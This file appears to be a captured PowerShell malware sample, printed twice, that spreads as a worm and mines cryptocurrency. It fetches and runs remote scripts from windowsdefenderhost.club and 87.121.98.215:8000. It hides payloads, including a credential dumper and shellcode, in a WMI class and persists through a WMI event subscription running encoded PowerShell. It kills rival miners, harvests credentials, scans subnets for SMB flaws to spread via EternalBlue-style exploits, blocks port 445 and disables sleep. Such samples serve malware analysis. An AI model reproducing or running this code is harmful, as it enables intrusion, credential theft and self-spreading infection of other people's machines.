vexx32/ObfuscatedCodefromInfo3.txt.ps1

## ObfuscatedCodefromInfo3.txt.ps1
$se=@(('updat'+'e.w'+'ind'+'o'+'w'+'sdefe'+'nder'+'h'+'ost.club'),('i'+'nf'+'o.win'+'dows'+'de'+'f'+'enderhos'+'t.c'+'lub'),('8'+'7.'+'121.98.215'))
$nic=('www.w'+'ind'+'ow'+'sdefe'+'nderhost'+'.cl'+'ub')
foreach($t in $se)
{
        $pin=teSt-`Co`NNec`TIoN $t
        if ($pin -ne $null)
        {
                $nic=$t
                break
        }
}
$nic=$nic+(':80'+'00')


if ((GeT`-wmI`oBJEcT Win32_OperatingSystem).osarchitecture.contains('64'))
{
        I`Ex(n`Ew`-ObJEct Net.WebClient).DownloadString("http://$nic/info6.ps1")
        return
}


function reload ($a){
$b=""
$size=[Math]::Floor($a.length/1000)
for($i=$size-1;$i -ge 0;$i--)
{
    $b+=$a.Substring($i*1000,1000)
}
$b+=$a.Substring($size*1000)
return $b
}
$fa=r`elOAD $fa

$mimi = $fa.SubString(0, 944812)
$mon = $fa.SubString(944818, 570712)
$funs = $fa.SubString(1515531, 519596)
$sc = $fa.SubString(2035144, 3264)

try{
    $StaticClass = NEw-O`B`jECT Management.ManagementClass((('root'+'{0}def'+'aul'+'t')  -f[CHAr]92), $null,$null)
    $StaticClass.Name = ('co'+'red'+'pussvr')
    $StaticClass.Put() | oUt`-NUll
    $StaticClass.Properties.Add(('mi'+'mi') , $mimi)
    $StaticClass.Put() | oU`T-nUll
    $StaticClass.Properties.Add(('m'+'on') , $mon)
    $StaticClass.Put() | out`-N`ULl
    $StaticClass.Properties.Add(('fu'+'ns') , $funs)
    $StaticClass.Put() | Out`-nu`LL
    $StaticClass.Properties.Add('sc' , $sc)
    $StaticClass.Put() | out`-NULL
    $StaticClass.Properties.Add(('i'+'psu') ," ")

    $StaticClass.Put() | OU`T-`NuLL
    $StaticClass.Properties.Add(('i'+'17') ," ")
    $StaticClass.Put() | O`UT-`NuLl
    $StaticClass.Properties.Add(('v'+'er'), ('1'+'.4'))
    $StaticClass.Put() | out`-NuLl
} catch {
    $defun=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs))
    I`Ex $defun
    $Networks = GET-`Wm`iOb`Ject Win32_NetworkAdapterConfiguration -EA Stop | ? {$_.IPEnabled}
    [byte[]]$sc=[System.Convert]::FromBase64String($sc)
    foreach ($Network in $Networks)
    {
        $IPAddress  = $Network.IpAddress[0]
        if ($IPAddress -match ('^1'+'69.254')){continue}
        $SubnetMask  = $Network.IPSubnet[0]
        $ips=ge`T`-nETwoRKr`ANGe $IPAddress $SubnetMask
        $tcpconn = N`E`TsTat -anop tcp
        foreach ($t in $tcpconn)
        {
            $line =$t.split(' ')| ?{$_}
            if (!($line -is [array])){continue}
            if ($line.count -le 4){continue}
            $i=$line[-3].split(':')[0]
            if ( ($line[-2] -eq ('ESTA'+'BL'+'ISHED')) -and  ($i -ne ('1'+'2'+'7.0.0.1')) -and ($ips -notcontains $i))
            {
                $ips+=$i
            }
        }
        if (([Environment]::TickCount-$stime)/1000 -gt 5400){break}
        foreach ($ip in $ips)
        {
            if (([Environment]::TickCount-$stime)/1000 -gt 5400){break}
            if ($ip -eq $IPAddress){continue}
            if ((TEST`-c`O`NNect`ioN $ip -count 1) -ne $null  -and $ipsu -notcontains $ip)
            {
                $vul=[PingCastle.Scanners.m17sc]::Scan($ip)
                if ($vul -and $i17 -notcontains $ip)
                {
                    $res=E`B7 $ip $sc
                    if (!($res -eq $true))
                    {e`B8 $ip $sc}
                    $i17 = $i17 + " "+$ip
                }
            }
        }
    }
}
$filterName = ('S'+'ystem Ev'+'ents '+'L'+'og F'+'ilter')
$consumerName = ('S'+'y'+'st'+'em Eve'+'nts Log '+'Consumer')
$Script=@'
$se=@('update.windowsdefenderhost.club','info.windowsdefenderhost.club','87.121.98.215')
$nic='www.windowsdefenderhost.club'
foreach($t in $se)
{
    $pin=test-connection $t

    if ($pin -ne $null)
    {
        $nic=$t
        break
    }
}
$nic=$nic+":8000"
$ver=(New-Object Net.WebClient).DownloadString("http://$nic/ver.txt").Trim()
if($ver -ne $null){
    if($ver -ne ([WmiClass] 'root\default:coredpussvr').Properties['ver'].Value){
        IEX (New-Object Net.WebClient).DownloadString("http://$nic/info3.ps1")
        return
    }
}
$stime=[Environment]::TickCount
$funs = ([WmiClass] 'root\default:coredpussvr').Properties['funs'].Value
$defun=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs))
iex $defun

Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Object {$_.filter -notmatch 'System Events Log'} |Remove-WmiObject

[array]$psids= get-process -name powershell |sort cpu -Descending| ForEach-Object {$_.id}
$tcpconn = netstat -anop tcp
$exist=$False
if ($psids -ne $null )
{
    foreach ($t in $tcpconn)
    {
        $line =$t.split(' ')| ?{$_}
        if ($line -eq $null)
        {continue}
        if (($psids[0] -eq $line[-1]) -and $t.contains("ESTABLISHED") -and ($t.contains(":80 ") -or $t.contains(":14444")) )
        {
            $exist=$true
            break
        }
    }
}

KillBot('coredpussvr')
foreach ($t in $tcpconn)
    {
        $line =$t.split(' ')| ?{$_}
        if (!($line -is [array])){continue}
        if (($line[-3] -ne $null) -and $t.contains("ESTABLISHED") -and ($line[-3].contains(":1111") -or $line[-3].contains(":2222") -or $line[-3].contains(":3333") -or $line[-3].contains(":4444") -or $line[-3].contains(":5555") -or $line[-3].contains(":6666") -or $line[-3].contains(":7777") -or $line[-3].contains(":8888") -or $line[-3].contains(":9999") -or $line[-3].contains(":14433") -or $line[-3].contains(":45560") -or $line[-3].contains(":65333") -or $line[-3].contains(":55335")))
        {
            $evid=$line[-1]
            Get-Process -id $evid | stop-process -force
        }
    }
if (!$exist -and ($psids.count -le 8))
{
    $cmdmon="powershell -NoP -NonI -W Hidden `"`$mon = ([WmiClass] 'root\default:coredpussvr').Properties['mon'].Value;`$funs = ([WmiClass] 'root\default:coredpussvr').Properties['funs'].Value ;iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(`$funs)));Invoke-Command  -ScriptBlock `$RemoteScriptBlock -ArgumentList @(`$mon, `$mon, 'Void', 0, '', '')`""
    $vbs = New-Object -ComObject WScript.Shell
        $vbs.run($cmdmon,0)
}

$NTLM=$False
$mimi = ([WmiClass] 'root\default:coredpussvr').Properties['mimi'].Value
$a, $NTLM= Get-creds $mimi $mimi

$Networks = Get-WmiObject Win32_NetworkAdapterConfiguration -EA Stop | ? {$_.IPEnabled}
$ipsu = ([WmiClass] 'root\default:coredpussvr').Properties['ipsu'].Value
$i17 = ([WmiClass] 'root\default:coredpussvr').Properties['i17'].Value
$scba= ([WmiClass] 'root\default:coredpussvr').Properties['sc'].Value
[byte[]]$sc=[System.Convert]::FromBase64String($scba)
foreach ($Network in $Networks)
{

    $IPAddress  = $Network.IpAddress[0]
        if ($IPAddress -match '^169.254'){continue}
    $SubnetMask  = $Network.IPSubnet[0]
    $ips=Get-NetworkRange $IPAddress $SubnetMask
        $tcpconn = netstat -anop tcp
        foreach ($t in $tcpconn)
    {
        $line =$t.split(' ')| ?{$_}
        if (!($line -is [array])){continue}
                if ($line.count -le 4){continue}
                $i=$line[-3].split(':')[0]
        if ( ($line[-2] -eq 'ESTABLISHED') -and  ($i -ne '127.0.0.1') -and ($ips -notcontains $i))
        {
            $ips+=$i
        }
    }
    if (([Environment]::TickCount-$stime)/1000 -gt 5400){break}
    foreach ($ip in $ips)
    {
        if (([Environment]::TickCount-$stime)/1000 -gt 5400){break}
        if ($ip -eq $IPAddress){continue}
        if ((Test-Connection $ip -count 1) -ne $null  -and $ipsu -notcontains $ip)
        {
            $re=0
            if ($a.count -ne 0)
            {$re = test-ip -ip $ip -creds $a  -nic $nic -ntlm $NTLM }
            if ($re -eq 1){$ipsu =$ipsu +" "+$ip}
                        else
                        {
                                $vul=[PingCastle.Scanners.m17sc]::Scan($ip)
                                if ($vul -and $i17 -notcontains $ip)
                                {
                                        $res=eb7 $ip $sc
                                        if (!($res -eq $true))
                                        {eb8 $ip $sc}
                                        $i17 = $i17 + " "+$ip
                                }
                        }
        }
    }
 }
$StaticClass=New-Object Management.ManagementClass('root\default:coredpussvr')
$StaticClass.SetPropertyValue('ipsu' ,$ipsu)
$StaticClass.Put()
$StaticClass.SetPropertyValue('i17' ,$i17)
$StaticClass.Put()
'@
$Scriptbytes  = [System.Text.Encoding]::Unicode.GetBytes($Script)
$EncodedScript=[System.Convert]::ToBase64String($Scriptbytes)

$Query = (('SELECT * FROM __Insta'+'nceModif'+'icat'+'ionE'+'vent WITH'+'IN 56'+'00'+' WHERE'+' T'+'arge'+'tInstance I'+'S'+'A tMrWin32_Perf'+'F'+'o'+'rma'+'ttedDa'+'ta_Perf'+'OS_Syst'+'em'+'tMr') -REplACE  'tMr',[chAr]39)
gE`T-`w`MiObjecT -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter (('__P'+'a'+'t'+'h LI'+'KE '+'{0}%System Events'+' L'+'og Consu'+'mer%{0}') -f[ChAR]39) | reM`OVE`-w`mIoBjE`CT
Get`-wMiObje`cT -Namespace root\Subscription -Class __EventFilter -filter (('name= 9MQSy'+'ste'+'m '+'Even'+'ts'+' L'+'og F'+'ilter9'+'MQ')-cREplacE  ([ChAR]57+[ChAR]77+[ChAR]81),[ChAR]39) |REMOV`E-w`m`IobjE`CT
GE`T-`wm`iO`BJeCt -Namespace root\Subscription -Class CommandLineEventConsumer -Filter (('Name'+'={0'+'}System Eve'+'nt'+'s Log Consumer'+'{0}') -F [char]39) | r`eMoVE-WMiOb`jECT

nE`Tsh ipsec static add policy name=netbc
N`eTSh ipsec static add filterlist name=block
ne`Tsh ipsec static add filteraction name=block action=block
n`eTsh ipsec static add filter filterlist=block any srcmask=32 srcport=0 dstaddr=me dstport=445 protocol=tcp description=445
n`eTSh ipsec static add rule name=block policy=netbc filterlist=block filteraction=block
Net`SH ipsec static set policy name=netbc assign=y

$FilterParams = @{
        Namespace = (('ro'+'ot5Gis'+'ubscr'+'ipti'+'on')  -cREPlAce ([chAR]53+[chAR]71+[chAR]105),[chAR]92)
        Class = ('__Ev'+'entF'+'ilter')
        Arguments =@{Name=$filterName;EventNameSpace=(('r'+'oot{0}cimv2')  -f[CHaR]92);QueryLanguage=('WQ'+'L');Query=$Query}
        ErrorAction = ('Silently'+'Continu'+'e')
    }
$WMIEventFilter = Set-`WmIINs`Ta`NcE @FilterParams

$ConsumerParams = @{
        Namespace = (('root{'+'0}'+'subscription')-f[ChaR]92)
        Class = ('Comm'+'andLi'+'neEventConsu'+'m'+'er')
        Arguments =@{ Name = $consumerName; CommandLineTemplate=('p'+'o'+'wershell.e'+'xe -NoP'+' -N'+'o'+'n'+'I'+' -W Hidde'+'n  -E ')+"$EncodedScript"}
        ErrorAction = ('S'+'ilentlyC'+'onti'+'nue')
    }
$WMIEventConsumer = s`et-Wm`i`InsTANce @ConsumerParams

SeT`-WMI`In`ST`Ance -Class __FilterToConsumerBinding -Namespace (('root'+'RB2su'+'bscri'+'pti'+'on').REPLaCE('RB2',[STRinG][CHaR]92)) -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer} | OU`T`-NUll

Sc`hTaSKS /delete /tn yastcat /f
if (TEs`T-p`ATH ($env:SystemRoot+(('WXUt'+'empW'+'XUy1'+'.'+'b'+'at').rEpLace('WXU',[sTRiNG][cHaR]92)))){R`emO`V`e-ItEM -Path ($env:SystemRoot+(('T'+'Hl'+'tempTHly'+'1.bat').REpLacE('THl',[StrInG][chAr]92)))  -Force}
po`w`ErCFG /CHANGE -standby-timeout-ac 0
P`OwERCFG /CHANGE -hibernate-timeout-ac 0
pO`we`RCfG -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000

[array]$psids= g`E`T-PROc`eSS -name powershell |sO`Rt cpu -Descending| FOreAC`H-`Obj`Ect {$_.id}
$tcpconn = NE`Tst`At -anop tcp
if ($psids -ne $null )
{
    foreach ($t in $tcpconn)
    {
        $line =$t.split(' ')| ?{$_}
        if ($line -eq $null)
        {continue}
        if (($psids[0] -eq $line[-1]) -and $t.contains(('ES'+'T'+'ABLI'+'SHED')) -and ($t.contains((':8'+'0 ')) -or $t.contains((':'+'14444'))) )
        {
            geT`-p`ROcESs -id $psids[0] | stop-P`Roc`ESs -force
            break
        }
    }
}

i`ex $script
	$se=@(('updat'+'e.w'+'ind'+'o'+'w'+'sdefe'+'nder'+'h'+'ost.club'),('i'+'nf'+'o.win'+'dows'+'de'+'f'+'enderhos'+'t.c'+'lub'),('8'+'7.'+'121.98.215'))
	$nic=('www.w'+'ind'+'ow'+'sdefe'+'nderhost'+'.cl'+'ub')
	foreach($t in $se)
	{
	$pin=teSt-`Co`NNec`TIoN $t
	if ($pin -ne $null)
	{
	$nic=$t
	break
	}
	}
	$nic=$nic+(':80'+'00')


	if ((GeT`-wmI`oBJEcT Win32_OperatingSystem).osarchitecture.contains('64'))
	{
	I`Ex(n`Ew`-ObJEct Net.WebClient).DownloadString("http://$nic/info6.ps1")
	return
	}



	function reload ($a){
	$b=""
	$size=[Math]::Floor($a.length/1000)
	for($i=$size-1;$i -ge 0;$i--)
	{
	$b+=$a.Substring($i*1000,1000)
	}
	$b+=$a.Substring($size*1000)
	return $b
	}
	$fa=r`elOAD $fa

	$mimi = $fa.SubString(0, 944812)
	$mon = $fa.SubString(944818, 570712)
	$funs = $fa.SubString(1515531, 519596)
	$sc = $fa.SubString(2035144, 3264)

	try{
	$StaticClass = NEw-O`B`jECT Management.ManagementClass((('root'+'{0}def'+'aul'+'t') -f[CHAr]92), $null,$null)
	$StaticClass.Name = ('co'+'red'+'pussvr')
	$StaticClass.Put() \| oUt`-NUll
	$StaticClass.Properties.Add(('mi'+'mi') , $mimi)
	$StaticClass.Put() \| oU`T-nUll
	$StaticClass.Properties.Add(('m'+'on') , $mon)
	$StaticClass.Put() \| out`-N`ULl
	$StaticClass.Properties.Add(('fu'+'ns') , $funs)
	$StaticClass.Put() \| Out`-nu`LL
	$StaticClass.Properties.Add('sc' , $sc)
	$StaticClass.Put() \| out`-NULL
	$StaticClass.Properties.Add(('i'+'psu') ," ")

	$StaticClass.Put() \| OU`T-`NuLL
	$StaticClass.Properties.Add(('i'+'17') ," ")
	$StaticClass.Put() \| O`UT-`NuLl
	$StaticClass.Properties.Add(('v'+'er'), ('1'+'.4'))
	$StaticClass.Put() \| out`-NuLl
	} catch {
	$defun=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs))
	I`Ex $defun
	$Networks = GET-`Wm`iOb`Ject Win32_NetworkAdapterConfiguration -EA Stop \| ? {$_.IPEnabled}
	[byte[]]$sc=[System.Convert]::FromBase64String($sc)
	foreach ($Network in $Networks)
	{
	$IPAddress = $Network.IpAddress[0]
	if ($IPAddress -match ('^1'+'69.254')){continue}
	$SubnetMask = $Network.IPSubnet[0]
	$ips=ge`T`-nETwoRKr`ANGe $IPAddress $SubnetMask
	$tcpconn = N`E`TsTat -anop tcp
	foreach ($t in $tcpconn)
	{
	$line =$t.split(' ')\| ?{$_}
	if (!($line -is [array])){continue}
	if ($line.count -le 4){continue}
	$i=$line[-3].split(':')[0]
	if ( ($line[-2] -eq ('ESTA'+'BL'+'ISHED')) -and ($i -ne ('1'+'2'+'7.0.0.1')) -and ($ips -notcontains $i))
	{
	$ips+=$i
	}
	}
	if (([Environment]::TickCount-$stime)/1000 -gt 5400){break}
	foreach ($ip in $ips)
	{
	if (([Environment]::TickCount-$stime)/1000 -gt 5400){break}
	if ($ip -eq $IPAddress){continue}
	if ((TEST`-c`O`NNect`ioN $ip -count 1) -ne $null -and $ipsu -notcontains $ip)
	{
	$vul=[PingCastle.Scanners.m17sc]::Scan($ip)
	if ($vul -and $i17 -notcontains $ip)
	{
	$res=E`B7 $ip $sc
	if (!($res -eq $true))
	{e`B8 $ip $sc}
	$i17 = $i17 + " "+$ip
	}
	}
	}
	}
	}
	$filterName = ('S'+'ystem Ev'+'ents '+'L'+'og F'+'ilter')
	$consumerName = ('S'+'y'+'st'+'em Eve'+'nts Log '+'Consumer')
	$Script=@'
	$se=@('update.windowsdefenderhost.club','info.windowsdefenderhost.club','87.121.98.215')
	$nic='www.windowsdefenderhost.club'
	foreach($t in $se)
	{
	$pin=test-connection $t

	if ($pin -ne $null)
	{
	$nic=$t
	break
	}
	}
	$nic=$nic+":8000"
	$ver=(New-Object Net.WebClient).DownloadString("http://$nic/ver.txt").Trim()
	if($ver -ne $null){
	if($ver -ne ([WmiClass] 'root\default:coredpussvr').Properties['ver'].Value){
	IEX (New-Object Net.WebClient).DownloadString("http://$nic/info3.ps1")
	return
	}
	}
	$stime=[Environment]::TickCount
	$funs = ([WmiClass] 'root\default:coredpussvr').Properties['funs'].Value
	$defun=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs))
	iex $defun

	Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription \| Where-Object {$_.filter -notmatch 'System Events Log'} \|Remove-WmiObject

	[array]$psids= get-process -name powershell \|sort cpu -Descending\| ForEach-Object {$_.id}
	$tcpconn = netstat -anop tcp
	$exist=$False
	if ($psids -ne $null )
	{
	foreach ($t in $tcpconn)
	{
	$line =$t.split(' ')\| ?{$_}
	if ($line -eq $null)
	{continue}
	if (($psids[0] -eq $line[-1]) -and $t.contains("ESTABLISHED") -and ($t.contains(":80 ") -or $t.contains(":14444")) )
	{
	$exist=$true
	break
	}
	}
	}

	KillBot('coredpussvr')
	foreach ($t in $tcpconn)
	{
	$line =$t.split(' ')\| ?{$_}
	if (!($line -is [array])){continue}
	if (($line[-3] -ne $null) -and $t.contains("ESTABLISHED") -and ($line[-3].contains(":1111") -or $line[-3].contains(":2222") -or $line[-3].contains(":3333") -or $line[-3].contains(":4444") -or $line[-3].contains(":5555") -or $line[-3].contains(":6666") -or $line[-3].contains(":7777") -or $line[-3].contains(":8888") -or $line[-3].contains(":9999") -or $line[-3].contains(":14433") -or $line[-3].contains(":45560") -or $line[-3].contains(":65333") -or $line[-3].contains(":55335")))
	{
	$evid=$line[-1]
	Get-Process -id $evid \| stop-process -force
	}
	}
	if (!$exist -and ($psids.count -le 8))
	{
	$cmdmon="powershell -NoP -NonI -W Hidden `"`$mon = ([WmiClass] 'root\default:coredpussvr').Properties['mon'].Value;`$funs = ([WmiClass] 'root\default:coredpussvr').Properties['funs'].Value ;iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(`$funs)));Invoke-Command -ScriptBlock `$RemoteScriptBlock -ArgumentList @(`$mon, `$mon, 'Void', 0, '', '')`""
	$vbs = New-Object -ComObject WScript.Shell
	$vbs.run($cmdmon,0)
	}

	$NTLM=$False
	$mimi = ([WmiClass] 'root\default:coredpussvr').Properties['mimi'].Value
	$a, $NTLM= Get-creds $mimi $mimi

	$Networks = Get-WmiObject Win32_NetworkAdapterConfiguration -EA Stop \| ? {$_.IPEnabled}
	$ipsu = ([WmiClass] 'root\default:coredpussvr').Properties['ipsu'].Value
	$i17 = ([WmiClass] 'root\default:coredpussvr').Properties['i17'].Value
	$scba= ([WmiClass] 'root\default:coredpussvr').Properties['sc'].Value
	[byte[]]$sc=[System.Convert]::FromBase64String($scba)
	foreach ($Network in $Networks)
	{

	$IPAddress = $Network.IpAddress[0]
	if ($IPAddress -match '^169.254'){continue}
	$SubnetMask = $Network.IPSubnet[0]
	$ips=Get-NetworkRange $IPAddress $SubnetMask
	$tcpconn = netstat -anop tcp
	foreach ($t in $tcpconn)
	{
	$line =$t.split(' ')\| ?{$_}
	if (!($line -is [array])){continue}
	if ($line.count -le 4){continue}
	$i=$line[-3].split(':')[0]
	if ( ($line[-2] -eq 'ESTABLISHED') -and ($i -ne '127.0.0.1') -and ($ips -notcontains $i))
	{
	$ips+=$i
	}
	}
	if (([Environment]::TickCount-$stime)/1000 -gt 5400){break}
	foreach ($ip in $ips)
	{
	if (([Environment]::TickCount-$stime)/1000 -gt 5400){break}
	if ($ip -eq $IPAddress){continue}
	if ((Test-Connection $ip -count 1) -ne $null -and $ipsu -notcontains $ip)
	{
	$re=0
	if ($a.count -ne 0)
	{$re = test-ip -ip $ip -creds $a -nic $nic -ntlm $NTLM }
	if ($re -eq 1){$ipsu =$ipsu +" "+$ip}
	else
	{
	$vul=[PingCastle.Scanners.m17sc]::Scan($ip)
	if ($vul -and $i17 -notcontains $ip)
	{
	$res=eb7 $ip $sc
	if (!($res -eq $true))
	{eb8 $ip $sc}
	$i17 = $i17 + " "+$ip
	}
	}
	}
	}
	}
	$StaticClass=New-Object Management.ManagementClass('root\default:coredpussvr')
	$StaticClass.SetPropertyValue('ipsu' ,$ipsu)
	$StaticClass.Put()
	$StaticClass.SetPropertyValue('i17' ,$i17)
	$StaticClass.Put()
	'@
	$Scriptbytes = [System.Text.Encoding]::Unicode.GetBytes($Script)
	$EncodedScript=[System.Convert]::ToBase64String($Scriptbytes)

	$Query = (('SELECT * FROM __Insta'+'nceModif'+'icat'+'ionE'+'vent WITH'+'IN 56'+'00'+' WHERE'+' T'+'arge'+'tInstance I'+'S'+'A tMrWin32_Perf'+'F'+'o'+'rma'+'ttedDa'+'ta_Perf'+'OS_Syst'+'em'+'tMr') -REplACE 'tMr',[chAr]39)
	gE`T-`w`MiObjecT -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter (('__P'+'a'+'t'+'h LI'+'KE '+'{0}%System Events'+' L'+'og Consu'+'mer%{0}') -f[ChAR]39) \| reM`OVE`-w`mIoBjE`CT
	Get`-wMiObje`cT -Namespace root\Subscription -Class __EventFilter -filter (('name= 9MQSy'+'ste'+'m '+'Even'+'ts'+' L'+'og F'+'ilter9'+'MQ')-cREplacE ([ChAR]57+[ChAR]77+[ChAR]81),[ChAR]39) \|REMOV`E-w`m`IobjE`CT
	GE`T-`wm`iO`BJeCt -Namespace root\Subscription -Class CommandLineEventConsumer -Filter (('Name'+'={0'+'}System Eve'+'nt'+'s Log Consumer'+'{0}') -F [char]39) \| r`eMoVE-WMiOb`jECT

	nE`Tsh ipsec static add policy name=netbc
	N`eTSh ipsec static add filterlist name=block
	ne`Tsh ipsec static add filteraction name=block action=block
	n`eTsh ipsec static add filter filterlist=block any srcmask=32 srcport=0 dstaddr=me dstport=445 protocol=tcp description=445
	n`eTSh ipsec static add rule name=block policy=netbc filterlist=block filteraction=block
	Net`SH ipsec static set policy name=netbc assign=y

	$FilterParams = @{
	Namespace = (('ro'+'ot5Gis'+'ubscr'+'ipti'+'on') -cREPlAce ([chAR]53+[chAR]71+[chAR]105),[chAR]92)
	Class = ('__Ev'+'entF'+'ilter')
	Arguments =@{Name=$filterName;EventNameSpace=(('r'+'oot{0}cimv2') -f[CHaR]92);QueryLanguage=('WQ'+'L');Query=$Query}
	ErrorAction = ('Silently'+'Continu'+'e')
	}
	$WMIEventFilter = Set-`WmIINs`Ta`NcE @FilterParams

	$ConsumerParams = @{
	Namespace = (('root{'+'0}'+'subscription')-f[ChaR]92)
	Class = ('Comm'+'andLi'+'neEventConsu'+'m'+'er')
	Arguments =@{ Name = $consumerName; CommandLineTemplate=('p'+'o'+'wershell.e'+'xe -NoP'+' -N'+'o'+'n'+'I'+' -W Hidde'+'n -E ')+"$EncodedScript"}
	ErrorAction = ('S'+'ilentlyC'+'onti'+'nue')
	}
	$WMIEventConsumer = s`et-Wm`i`InsTANce @ConsumerParams

	SeT`-WMI`In`ST`Ance -Class __FilterToConsumerBinding -Namespace (('root'+'RB2su'+'bscri'+'pti'+'on').REPLaCE('RB2',[STRinG][CHaR]92)) -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer} \| OU`T`-NUll

	Sc`hTaSKS /delete /tn yastcat /f
	if (TEs`T-p`ATH ($env:SystemRoot+(('WXUt'+'empW'+'XUy1'+'.'+'b'+'at').rEpLace('WXU',[sTRiNG][cHaR]92)))){R`emO`V`e-ItEM -Path ($env:SystemRoot+(('T'+'Hl'+'tempTHly'+'1.bat').REpLacE('THl',[StrInG][chAr]92))) -Force}
	po`w`ErCFG /CHANGE -standby-timeout-ac 0
	P`OwERCFG /CHANGE -hibernate-timeout-ac 0
	pO`we`RCfG -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000

	[array]$psids= g`E`T-PROc`eSS -name powershell \|sO`Rt cpu -Descending\| FOreAC`H-`Obj`Ect {$_.id}
	$tcpconn = NE`Tst`At -anop tcp
	if ($psids -ne $null )
	{
	foreach ($t in $tcpconn)
	{
	$line =$t.split(' ')\| ?{$_}
	if ($line -eq $null)
	{continue}
	if (($psids[0] -eq $line[-1]) -and $t.contains(('ES'+'T'+'ABLI'+'SHED')) -and ($t.contains((':8'+'0 ')) -or $t.contains((':'+'14444'))) )
	{
	geT`-p`ROcESs -id $psids[0] \| stop-P`Roc`ESs -force
	break
	}
	}
	}

	i`ex $script